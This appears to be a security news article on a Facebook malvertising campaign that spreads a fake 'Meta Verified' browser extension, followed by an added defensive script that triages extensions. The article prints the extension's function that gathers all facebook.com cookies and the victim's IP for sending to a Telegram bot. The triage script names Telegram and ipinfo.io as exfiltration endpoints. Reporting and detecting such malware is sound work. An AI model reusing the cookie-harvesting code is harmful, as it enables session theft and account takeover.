Malicious actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake “Meta Verified” browser extension.
Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta’s subscription fee.
In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.
By leveraging trusted platforms like Box.com for hosting, attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.
Upon closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.
The extension’s code, although clumsily obfuscated and likely generated by an AI-assisted toolkit, still effectively exfiltrates data.
Bitdefender analysts identified the use of the Facebook Graph API to query Business account information once valid access tokens are acquired, allowing attackers to distinguish high-value corporate profiles from personal accounts.
Victims who follow the tutorial unwittingly grant the extension permissions to read and export cookies from the facebook.com domain.
Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.
To further personalize the stolen data, the malware queries https://ipinfo.io/json to append geolocation details, bolstering its marketability on underground forums.
Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for generating new campaign assets with minimal manual effort.
The modular design also supports automatic execution upon Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.
Infection Mechanism Deep Dive
The core of the infection mechanism lies in the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens without triggering user prompts.
After installation, which is triggered by clicking on an ad link, the extension calls chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies. Within the callback, it constructs the payload:
async function exportCookies() {
  chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
    // Flatten every cookie into "name=value;name=value;..."
    const cookieString = cookies.map(c => `${c.name}=${c.value}`).join(";");
    // The c_user cookie carries the logged-in Facebook user ID
    const userId = cookies.find(c => c.name === "c_user")?.value || "Unknown";
    // Append the victim's public IP and geolocation from ipinfo.io
    const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
    const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
    sendToTelegram(payload); // exfiltration helper defined elsewhere in the extension
  });
}
This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.
Security teams should monitor abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.
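Extension vetting of the kind recommended above, as an added example that is not the extension's or Bitdefender's code: a Node.js heuristic that flags a manifest requesting the cookies permission together with facebook.com host access and a background script that calls chrome.cookies.getAll, and lists the exfiltration endpoints named in the article if they appear in the script. The sample manifest and background script are constructed for illustration.

```javascript
// Heuristic static triage for the cookie-theft pattern described above (added example,
// not the extension's or Bitdefender's code). Sample manifest and script are constructed.
const COOKIE_API = /chrome\.cookies\.getAll/;
const EXFIL_HOSTS = [/api\.telegram\.org/, /ipinfo\.io/];

// True when a Chrome host match pattern grants access to facebook.com.
function coversFacebook(pattern) {
  if (pattern === "<all_urls>") return true;
  const m = /^(\*|https?|wss?|ftp):\/\/([^/]+)\//.exec(pattern);
  if (!m) return false;
  const host = m[2];
  return host === "*" || host === "facebook.com" || host.endsWith(".facebook.com");
}

// Inspect a JSON-parsed manifest (MV2 or MV3) for cookie access to Facebook.
function assessManifest(manifest) {
  const perms = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  return {
    hasCookiesPermission: perms.includes("cookies"),
    facebookHostAccess: perms.filter(coversFacebook),
    hasBackground: Boolean(manifest.background),
  };
}

// Inspect background script source for the cookie export call and known exfil endpoints.
function assessSource(code) {
  return {
    callsCookiesGetAll: COOKIE_API.test(code),
    exfilEndpoints: EXFIL_HOSTS.filter(re => re.test(code)).map(re => re.source.replace(/\\/g, "")),
  };
}

// cookies permission + Facebook host access + getAll call = HIGH; cookies permission alone = REVIEW.
function triage(manifest, code) {
  const m = assessManifest(manifest), s = assessSource(code);
  const high = m.hasCookiesPermission && m.facebookHostAccess.length > 0 && s.callsCookiesGetAll;
  return { ...m, ...s, verdict: high ? "HIGH" : m.hasCookiesPermission ? "REVIEW" : "LOW" };
}

// Constructed sample mimicking the campaign's extension; not a real artifact.
const sampleManifest = {
  manifest_version: 3,
  permissions: ["cookies", "storage"],
  host_permissions: ["*://*.facebook.com/*"],
  background: { service_worker: "background.js" },
};
const sampleBackground = 'chrome.cookies.getAll({ domain: "facebook.com" }, cs => {\n' +
  '  fetch("https://api.telegram.org/<placeholder>", { method: "POST", body: "..." }); });';
console.log(triage(sampleManifest, sampleBackground));
```

Run it against each unpacked extension directory by loading manifest.json and the script it names under background; a HIGH verdict is a candidate for manual review, not proof of malice.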